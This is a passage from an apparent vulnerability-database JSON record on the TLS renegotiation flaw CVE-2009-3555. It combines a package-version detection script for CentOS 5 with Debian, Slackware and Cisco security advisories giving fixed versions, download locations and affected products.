re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"nspr on CentOS 5\");\n script_tag(name:\"insight\", value:\"Network Security Services (NSS) is a set of libraries designed to support\n the cross-platform development of security-enabled client and server\n applications. Applications built with NSS can support SSLv2, SSLv3, TLS,\n and other security standards.\n\n Netscape Portable Runtime (NSPR) provides platform independence for non-GUI\n operating system facilities. These facilities include threads, thread\n synchronization, normal file and network I/O, interval timing, calendar\n time, basic memory management (malloc and free), and shared library\n linking.\n\n A flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\n Sockets Layer) protocols handled session renegotiation. A man-in-the-middle\n attacker could use this flaw to prefix arbitrary plain text to a client's\n session (for example, an HTTPS connection to a website). This could force\n the server to process an attacker's request as if authenticated using the\n victim's credentials. This update addresses this flaw by implementing the\n TLS Renegotiation Indication Extension, as defined in RFC 5746.\n (CVE-2009-3555)\n\n Refer to the referenced Knowledgebase article for additional details about\n this flaw.\n\n Users of Red Hat Certificate System 7.3 and 8.0 should review the referenced\n Knowledgebase article before installing this update.\n\n All users of NSS are advised to upgrade to these updated packages, which\n update NSS to version 3.12.6. This erratum also updates the NSPR packages\n to the version required by NSS 3.12.6. All running applications using the\n NSS library must be restarted for this update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~1.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr-devel\", rpm:\"nspr-devel~4.8.4~1.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-devel\", rpm:\"nss-devel~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-pkcs11-devel\", rpm:\"nss-pkcs11-devel~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss-tools\", rpm:\"nss-tools~3.12.6~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:44", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-4 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 12, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : lighttpd\nVulnerability : compatibility problem with updated openssl\nDebian-specific: no\nCVE ID : CVE-2009-3555\nDebian Bug : 609124\n\nThe openssl update in DSA-2141-1 caused a regression in lighttpd. Due\nto a bug in lighttpd, the server fails to start in some configurations\nif using the updated openssl libraries. This update fixes this problem.\n\nFor the stable distribution (lenny), the problem has been fixed in\nversion 1.4.19-5+lenny2.\n\nThe packages for the hppa, mips, and mipsel architectures are not yet\navailable. They will be released as soon as they have been built.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), the problem has been fixed some time ago in version 1.4.26-3.\n\nWe recommend that you upgrade your lighttpd packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2011-01-12T18:51:30", "published": "2011-01-12T18:51:30", "id": "DEBIAN:DSA-2141-4:2215A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00006.html", "title": "[SECURITY] [DSA-2141-4] New lighttpd packages fix regression", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:53", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2141-2 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nJanuary 06, 2011 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : nss\nVulnerability : SSL/TLS insecure renegotiation protocol design flaw\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-3555\n\nCVE-2009-3555:\n\nMarsh Ray, Steve Dispensa, and Martin Rex discovered a flaw in the TLS\nand SSLv3 protocols. If an attacker could perform a man in the middle\nattack at the start of a TLS connection, the attacker could inject\narbitrary content at the beginning of the user's session. This update\nadds backported support for the new RFC5746 renegotiation extension\nwhich fixes this issue.\n\nThe updated libraries allow to use shell environment variables to\nconfigure if insecure renegotiation is still allowed. The syntax of\nthese environment variables is described in the release notes to\nversion 3.12.6 of nss:\n \nhttps://developer.mozilla.org/NSS_3.12.6_release_notes\n\nHowever, the default behaviour for nss in Debian 5.0 (Lenny) is \nNSS_SSL_ENABLE_RENEGOTIATION=3, which allows clients to continue to\nrenegotiate with vulnerable servers.\n\nFor the stable distribution (lenny), this problem has been fixed\nin version 3.12.3.1-0lenny3.\n\nFor the unstable distribution (sid), and the testing distribution\n(squeeze), this problem has been fixed in version 3.12.6-1.\n\nWe recommend that you upgrade your nss package.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2011-01-05T23:20:42", "published": "2011-01-05T23:20:42", "id": "DEBIAN:DSA-2141-2:2C2CF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00002.html", "title": "[SECURITY] [DSA-2141-2] New nss packages fix protocol design flaw", "type": "debian", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:36:52", "bulletinFamily": "unix", "description": "New openssl packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/openssl-0.9.8k-i486-3_slack13.0.txz: Rebuilt.\n Patched to disable SSL renegotiation.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n (* Security fix *)\npatches/packages/openssl-solibs-0.9.8k-i486-3_slack13.0.txz: Rebuilt.\n Patched to disable SSL renegotiation.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/openssl-0.9.8h-i486-4_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/openssl-solibs-0.9.8h-i486-4_slack11.0.tgz\n\nUpdated packages for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/openssl-0.9.8h-i486-4_slack12.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/openssl-solibs-0.9.8h-i486-4_slack12.0.tgz\n\nUpdated packages for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/openssl-0.9.8h-i486-4_slack12.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/openssl-solibs-0.9.8h-i486-4_slack12.1.tgz\n\nUpdated packages for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/openssl-0.9.8i-i486-4_slack12.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/openssl-solibs-0.9.8i-i486-4_slack12.2.tgz\n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8k-i486-3_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8k-i486-3_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8k-x86_64-3_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8k-x86_64-3_slack13.0.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-0.9.8l-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-0.9.8l-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-0.9.8l-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-0.9.8l-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 packages:\n662fa4e1a24aba53e5a05850b27d5c16 openssl-0.9.8h-i486-4_slack11.0.tgz\nb08b28f848b64df600a958268dd6a350 openssl-solibs-0.9.8h-i486-4_slack11.0.tgz\n\nSlackware 12.0 packages:\n6cdad3839394c5d81f56b7812f38e1d2 openssl-0.9.8h-i486-4_slack12.0.tgz\ncd44b602ada795dd60c2e0a5b113a235 openssl-solibs-0.9.8h-i486-4_slack12.0.tgz\n\nSlackware 12.1 packages:\nf07db73dcfc7d0f09796199591805685 openssl-0.9.8h-i486-4_slack12.1.tgz\n8ad915a9a85bf049da8593f3966fa155 openssl-solibs-0.9.8h-i486-4_slack12.1.tgz\n\nSlackware 12.2 packages:\n71e904cdd763254146c3d17cb67dabd9 openssl-0.9.8i-i486-4_slack12.2.tgz\n3350b268966c39f884df46b839cbc216 openssl-solibs-0.9.8i-i486-4_slack12.2.tgz\n\nSlackware 13.0 packages:\nbf569bd9e2b6f6d12feb9926a2f4228c openssl-0.9.8k-i486-3_slack13.0.txz\ne9042a6460ee448bcb32dee4f090be74 openssl-solibs-0.9.8k-i486-3_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n068a889c7120f569be44e7ffde9169d1 openssl-0.9.8k-x86_64-3_slack13.0.txz\n7602b43d1e51a121e1f4a33919be48bf openssl-solibs-0.9.8k-x86_64-3_slack13.0.txz\n\nSlackware -current packages:\n98f992b68c19070a6edeb0d4a6a0f559 openssl-solibs-0.9.8l-i486-1.txz\n\nSlackware x86_64 -current packages:\nc62ac6d683a8ed6f94da8c7555810d81 openssl-solibs-0.9.8l-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg openssl-0.9.8k-i486-3_slack13.0.txz openssl-solibs-0.9.8k-i486-3_slack13.0.txz", "modified": "2009-11-16T13:42:36", "published": "2009-11-16T13:42:36", "id": "SSA-2009-320-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.597446", "title": "openssl", "type": "slackware", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:30:52", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-11-10T00:00:00", "published": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12600", "id": "SSV:12600", "type": "seebug", "title": "Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Transport Layer Security Renegotiation\r\nVulnerability\r\n\r\nAdvisory ID: cisco-sa-20091109-tls\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2009 November 9 1600 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nAn industry-wide vulnerability exists in the Transport Layer Security\r\n(TLS) protocol that could impact any Cisco product that uses any version\r\nof TLS and SSL. The vulnerability exists in how the protocol handles\r\nsession renegotiation and exposes users to a potential man-in-the-middle\r\nattack.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nCisco is currently evaluating products for possible exposure to these\r\nTLS issues. Products will only be listed in the Vulnerable Products or\r\nProducts Confirmed Not Vulnerable sections of this advisory when a final\r\ndetermination about product exposure is made. Products that are not\r\nlisted in either of these two sections are still being evaluated.\r\n\r\nVulnerable Products\r\n- -------------------\r\n\r\nThis section will be updated when more information is available.\r\n\r\nProducts Confirmed Not Vulnerable\r\n- ---------------------------------\r\n\r\nThe following products are confirmed not vulnerable:\r\n\r\n * Cisco AnyConnect VPN Client\r\n\r\nThis section will be updated when more information is available.\r\n\r\nDetails\r\n=======\r\n\r\nTLS and its predecessor, SSL, are cryptographic protocols that provide\r\nsecurity for communications over IP data networks such as the Internet.\r\nAn industry-wide vulnerability exists in the TLS protocol that could\r\nimpact any Cisco product that uses any version of TLS and SSL. The\r\nvulnerability exists in how the protocol handles session renegotiation\r\nand exposes users to a potential man-in-the-middle attack.\r\n\r\nThe following Cisco Bug IDs are being used to track potential exposure\r\nto the SSL and TLS issues. The bugs listed below do not confirm\r\nthat a product is vulnerable, but rather that the product is under\r\ninvestigation by the appropriate product teams.\r\n\r\nRegistered Cisco customers can view these bugs via Cisco's Bug Toolkit:\r\nhttp://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl\r\n\r\n+------------------------------------------------------------+\r\n| Product | Bug ID |\r\n|----------------------------+-------------------------------|\r\n| Cisco Adaptive Security | CSCtd01491 |\r\n| Device Manager (ASDM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Software | CSCtd01646 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Healthcare for | CSCtd01652 |\r\n| HIPAA and ePrescription | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application and | CSCtd01529 |\r\n| Content Networking System | |\r\n| (ACNS) Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application | CSCtd01480 |\r\n| Networking Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA 5500 Series | CSCtd00697 |\r\n| Adaptive Security | |\r\n| Appliances | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA Advanced | |\r\n| Inspection and Prevention | CSCtd01539 |\r\n| (AIP) Security Services | |\r\n| Module | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AVS 3100 Series | CSCtd01566 |\r\n| Application Velocity | |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Catalyst 6500 Series | CSCtd06389 |\r\n| SSL Services Module | |\r\n|----------------------------+-------------------------------|\r\n| Firewall Services Module | CSCtd04061 |\r\n| FWSM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco CSS 11000 Series | CSCtd01636 |\r\n| Content Services Switches | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Phones | CSCtd01446 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Center Network | CSCtd02635 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Mobility | CSCtd02642 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01703 |\r\n| Encoders | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01692 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01718 |\r\n| Players | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Emergency Responder | CSCtd02650 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XE Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XR Software | CSCtd02658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IP Communicator | CSCtd02662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| CATOS | CSCtd00662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IronPort Appliances | CSCtd02069 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified MeetingPlace | CSCtd02709 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Appliance (Clean | CSCtd01453 |\r\n| Access) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Guest Server | CSCtd01462 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Profiler | CSCtd02716 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Analysis | CSCtd02729 |\r\n| Module Software (NAM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Registrar | CSCtd02748 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ONS 15500 Series | CSCtd02769 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd02777 |\r\n| Gateways | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd03912 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Security | CSCtd03920 |\r\n| ISM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco QoS Device Manager | CSCtd03923 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Access | CSCtd00725 |\r\n| Control Server (ACS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Desktop | CSCtd03928 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Services | CSCtd03935 |\r\n| Client | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Agent CSA | CSCtd02689 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Monitoring, | CSCtd02654 |\r\n| Analysis and Response | |\r\n| System (MARS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified IP Phones | CSCtd04121 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Service Control | CSCtd04171 |\r\n| Subscriber Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence Manager | CSCtd01771 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Telepresence for Consumer | CSCtd01752 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence | CSCtd01742 |\r\n| Recording Server | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Asset | CSCtd04198 |\r\n| Collector | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified | CSCtd01282 |\r\n| Communications Manager | |\r\n| (CallManager) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Business | CSCtd05731 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Enterprise | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Express | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05755 |\r\n| Center Management Portal | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Products | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Department | CSCtd05733 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified E-Mail | CSCtd05756 |\r\n| Interaction Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Enterprise | CSCtd05735 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobile | CSCtd05762 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05786 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05783 |\r\n| Advantage | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Operations | CSCtd05784 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Personal | CSCtd05759 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Presence | CSCtd05791 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Provisioning | CSCtd05777 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Quick | CSCtd05738 |\r\n| Connect | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CSCtd05780 |\r\n| Monitor | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CStCd05778 |\r\n| Statistics Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Proxy | CSCtd05765 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unity | CSCtd02855 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NX-OS Software | CSCtd00699 and CSCtd00703 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Portal | CSCtd04097 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02831 |\r\n| Media Server Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02780 |\r\n| Operations Manager | |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wide Area File | CSCtd04106 |\r\n| Services Software (WAFS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Control | CSCtd01625 |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless LAN | CSCtd01611 |\r\n| Controller (WLAN) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Location | CSCtd04115 |\r\n| Appliance | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Common Services | CSCtd01597 |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Wireless LAN | CSCtd04111 |\r\n| Solution Engine (WLSE) | |\r\n+------------------------------------------------------------+\r\n\r\nThis vulnerability has been assigned the Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2009-3555.\r\n\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerability in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n* TLS Renegotiation Vulnerability (all Cisco Bugs above)\r\n\r\nCVSS Base Score - 4.3\r\n Access Vector - Network\r\n Access Complexity - Medium\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - None\r\n\r\nCVSS Temporal Score - 4.1\r\n Exploitability - Functional\r\n Remediation Level - Unavailable\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nThis section will be updated when more information is available.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nThis section will be updated to include fixed software versions for\r\naffected Cisco products as they become available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nWorkarounds are being investigated. This section will be updated when\r\nmore information becomes available.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address this\r\nvulnerability. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature\r\nsets they have purchased. By installing, downloading, accessing\r\nor otherwise using such software upgrades, customers agree to be\r\nbound by the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n- --------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n- -------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Due to the variety of affected\r\nproducts and releases, customers should consult with their service\r\nprovider or support organization to ensure any applied workaround or fix\r\nis the most appropriate for use in the intended network before it is\r\ndeployed.\r\n\r\nCustomers without Service Contracts\r\n- -----------------------------------\r\n\r\nCustomers who purchase direct from Cisco but do not hold a Cisco service\r\ncontract, and customers who purchase through third-party vendors but are\r\nunsuccessful in obtaining fixed software through their point of sale\r\nshould acquire upgrades by contacting the Cisco Technical Assistance\r\nCenter (TAC). TAC contacts are as follows.\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have their product serial number available and be\r\nprepared to give the URL of this notice as evidence of entitlement to a\r\nfree upgrade. Free upgrades for non-contract customers must be requested\r\nthrough the TAC.\r\n\r\nRefer to\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, and instructions and e-mail addresses for use in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThis vulnerability was initially discovered by Marsh Ray and Steve\r\nDispensa from PhoneFactor, Inc.\r\n\r\nCisco is not aware of any malicious exploitation of this vulnerability.\r\n\r\nProof-of-concept exploit code has been published for this vulnerability.\r\n\r\nStatus of this Notice: INTERIM\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at:\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2009-November-9 | Initial public release |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities\r\nin Cisco products, obtaining assistance with security\r\nincidents, and registering to receive security information\r\nfrom Cisco, is available on Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding\r\nCisco security notices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2008-2009 Cisco Systems, Inc. All rights 